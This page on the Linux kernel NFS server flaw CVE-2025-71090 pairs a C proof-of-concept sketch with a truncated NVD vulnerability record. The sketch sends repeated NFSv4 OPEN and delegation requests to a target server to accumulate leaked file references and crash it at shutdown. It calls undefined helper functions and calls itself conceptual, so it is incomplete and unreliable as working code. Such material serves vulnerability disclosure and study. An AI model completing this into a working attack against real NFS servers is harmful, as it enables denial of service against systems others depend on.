CVE-2025-71090

// CVE-2025-71090 PoC - nfsd_file Reference Leak // This PoC demonstrates the reference leak in nfsd4_add_rdaccess_to_wrdeleg() // Environment: Linux kernel with NFSv4 server enabled #include <stdio.h> #include <stdlib.h> #include <string.h> #include <rpc/rpc.h> #include <nfs/nfs.h> /* * Attack Scenario: * 1. Client establishes NFSv4 session with server * 2. Client opens a file with OPEN operation (SHARE_ACCESS_READ) * 3. Server grants delegation with READ access * 4. Client calls OPEN with OPEN4_SHARE_ACCESS_READ again * 5. This triggers nfsd4_add_rdaccess_to_wrdeleg() which overwrites * fp->fi_fds[O_RDONLY] without releasing existing reference * 6. Repeated operations cause reference count leak * 7. Server shutdown triggers BUG() in kmem_cache_destroy() */ // NFSv4 OPEN operation with READ share access void nfs4_open_with_read_share(int sock, char *filename) { // Construct NFSv4 OPEN compound request // Operation: OPEN with share_access = READ printf("[*] Sending NFSv4 OPEN with SHARE_ACCESS_READ\n"); // Simulate multiple OPEN operations to trigger leak for (int i = 0; i < 100; i++) { send_nfs4_open_request(sock, filename, OPEN4_SHARE_ACCESS_READ); recv_nfs4_response(sock); usleep(1000); } } // Request delegation with read access void nfs4_request_delegation(int sock, char *filename) { printf("[*] Requesting READ delegation\n"); // This triggers nfsd4_add_rdaccess_to_wrdeleg() send_nfs4_delegation_request(sock, filename, CLAIM_DELEGATE_CUR); recv_nfs4_response(sock); } int main(int argc, char *argv[]) { if (argc < 2) { fprintf(stderr, "Usage: %s <nfs_server_ip>\n", argv[0]); return 1; } char *server = argv[1]; int sock; printf("[*] CVE-2025-71090 PoC - nfsd_file reference leak\n"); printf("[*] Target: %s\n", server); // Connect to NFS server sock = nfs_connect(server, 2049); // Establish NFSv4 session nfs4_exchange_id(sock); nfs4_create_session(sock); // Step 1: Open file with READ share nfs4_open_with_read_share(sock, "/testfile.txt"); // Step 2: Request delegation (triggers vulnerability) nfs4_request_delegation(sock, "/testfile.txt"); // Step 3: Continue operations to accumulate leaks for (int round = 0; round < 10; round++) { nfs4_open_with_read_share(sock, "/testfile.txt"); nfs4_request_delegation(sock, "/testfile.txt"); } printf("[*] Leaked references accumulated\n"); printf("[*] Server shutdown will trigger BUG() in kmem_cache_destroy()\n"); nfs_disconnect(sock); return 0; } // Note: This is a conceptual PoC. Actual implementation requires // NFSv4 protocol library and proper RPC handling. // The vulnerability is triggered by: // 1. Having existing READ share access // 2. Then receiving delegation with READ access // 3. This causes nfsd4_add_rdaccess_to_wrdeleg() to overwrite // fp->fi_fds[O_RDONLY] without proper reference release

{"cve": {"id": "CVE-2025-71090", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:08.700", "lastModified": "2026-03-25T18:12:03.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()\n\nnfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites\nfp->fi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if\nthe client already has a SHARE_ACCESS_READ open from a previous OPEN\noperation, this action overwrites the existing pointer without\nreleasing its reference, orphaning the previous reference.\n\nAdditionally, the function originally stored the same nfsd_file\npointer in both fp->fi_fds[O_RDONLY] and fp->fi_rdeleg_file with\nonly a single reference. When put_deleg_file() runs, it clears\nfi_rdeleg_file and calls nfs4_file_put_access() to release the file.\n\nHowever, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when\nthe fi_access[O_RDONLY] counter drops to zero. If another READ open\nexists on the file, the counter remains elevated and the nfsd_file\nreference from the delegation is never released. This potentially\ncauses open conflicts on that file.\n\nThen, on server shutdown, these leaks cause __nfsd_file_cache_purge()\nto encounter files with an elevated reference count that cannot be\ncleaned up, ultimately triggering a BUG() in kmem_cache_destroy()\nbecause there are still nfsd_file objects allocated in that cache."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnfsd: corregir fuga de referencia de nfsd_file en nfsd4_add_rdaccess_to_wrdeleg()\n\nnfsd4_add_rdaccess_to_wrdeleg() sobrescribe incondicionalmente fp-&gt;fi_fds[O_RDONLY] con un nfsd_file recién adquirido. Sin embargo, si el cliente ya tiene una apertura SHARE_ACCESS_READ de una operación OPEN anterior, esta acción sobrescribe el puntero existente sin liberar su referencia, dejando huérfana la referencia anterior.\n\nAdemás, la función originalmente almacenaba el mismo puntero nfsd_file tanto en fp-&gt;fi_fds[O_RDONLY] como en fp-&gt;fi_rdeleg_file con una sola referencia. Cuando se ejecuta put_deleg_file(), borra fi_rdeleg_file y llama a nfs4_file_put_access() para liberar el archivo.\n\nSin embargo, nfs4_file_put_access() solo libera fi_fds[O_RDONLY] cuando el contador fi_access[O_RDONLY] cae a cero. Si existe otra apertura READ en el archivo, el contador permanece elevado y la referencia nfsd_file de la delegación nunca se libera. Esto potencialmente causa conflictos de apertura en ese archivo.\n\nLuego, al apagar el servidor, estas fugas hacen que __nfsd_file_cache_purge() encuentre archivos con un recuento de referencias elevado que no pueden ser limpiados, lo que finalmente dispara un BUG() en kmem_cache_destroy() porque todavía hay objetos nfsd_file asignados en esa caché."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.1", "versionEndExcluding": "6.18.4", "matchCriteriaId": "312F9EA6-4B54-4FDE-90FB-1414FF6BD0E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:-:*:*:*:*:*:*", "matchCriteriaId": "7CC8B11D-82DC-4958-8DC7-BF5CC829A5E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteri ... (truncated)